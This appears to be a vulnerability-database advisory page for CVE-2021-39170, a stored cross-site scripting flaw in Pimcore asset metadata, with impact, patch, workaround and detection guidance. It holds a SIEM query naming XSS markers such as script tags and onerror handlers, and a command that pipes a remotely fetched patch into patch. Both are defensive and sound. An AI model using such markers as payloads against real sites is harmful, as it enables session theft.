Login Sign Up

CVE-2021-39170

8.0 HIGH
Cross-Site Scripting

📋 TL;DR

CVE-2021-39170 is a stored cross-site scripting (XSS) vulnerability in Pimcore that allows authenticated users to inject malicious scripts into asset metadata fields. When other users view assets containing this malicious metadata, the scripts execute in their browser context. This affects all Pimcore installations prior to version 10.1.2 where users have asset management permissions.

💻 Affected Systems

Products:
  • Pimcore
Versions: All versions prior to 10.1.2
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user with asset management permissions. The vulnerability exists in the custom metadata functionality for assets.

📦 What is this software?

Pimcore by Pimcore

View all CVEs affecting Pimcore →

⚠️ Risk & Real-World Impact

🔴

Worst Case

An authenticated attacker could steal session cookies, perform actions as other users, deface the interface, or redirect users to malicious sites, potentially leading to full account compromise and data theft.

🟠

Likely Case

Attackers with legitimate user accounts could perform session hijacking, steal sensitive data displayed in the interface, or manipulate user sessions for privilege escalation.

🟢

If Mitigated

With proper input validation and output encoding, the XSS payloads would be rendered harmless as text rather than executable code.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access. The patch and advisory provide clear details about the vulnerable code path.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 10.1.2

Vendor Advisory: https://github.com/pimcore/pimcore/security/advisories/GHSA-2v88-qq7x-xq5f

Restart Required: No

Instructions:

1. Update Pimcore to version 10.1.2 or later using your package manager or deployment method. 2. Verify the update completed successfully. 3. Clear any caches if applicable.

🔧 Temporary Workarounds

Manual patch application

linux

Apply the security patch from GitHub without upgrading the entire Pimcore installation

curl -L https://github.com/pimcore/pimcore/pull/10178.patch | patch -p1

🧯 If You Can't Patch

  • Restrict asset metadata editing permissions to only trusted administrators
  • Implement web application firewall (WAF) rules to block XSS payloads in metadata fields

🔍 How to Verify

Check if Vulnerable:

Check if Pimcore version is below 10.1.2. Review if custom metadata fields on assets accept and execute JavaScript code without proper sanitization.

Check Version:

php bin/console pimcore:version

Verify Fix Applied:

After patching, attempt to inject XSS payloads into asset metadata fields and verify they are properly sanitized and do not execute.

📡 Detection & Monitoring

Log Indicators:

  • Unusual metadata updates containing script tags or JavaScript code
  • Multiple failed XSS attempts in metadata fields

Network Indicators:

  • Unexpected outbound connections from Pimcore interface when viewing assets

SIEM Query:

source="pimcore" AND ("metadata" OR "asset") AND ("<script>" OR "javascript:" OR "onerror=" OR "onload=")

📊 Metadata

CVE ID: CVE-2021-39170
CVSS v3 Score: 8.0 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE: CWE-116
Published: September 1, 2021
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-39170, you might also want to check these:

CVE-2025-55729 10.0

CVE-2025-55729 is a critical remote code execution vulnerability in XWiki Remote Macros that allows ...

Same vulnerability type (CWE-116)
CVE-2022-23603 9.9

CVE-2022-23603 is a code injection vulnerability in iTunesRPC-Remastered, a Discord rich presence ap...

Same vulnerability type (CWE-116)
CVE-2024-38474 9.8

A substitution encoding vulnerability in Apache HTTP Server's mod_rewrite module allows attackers to...

Same vulnerability type (CWE-116)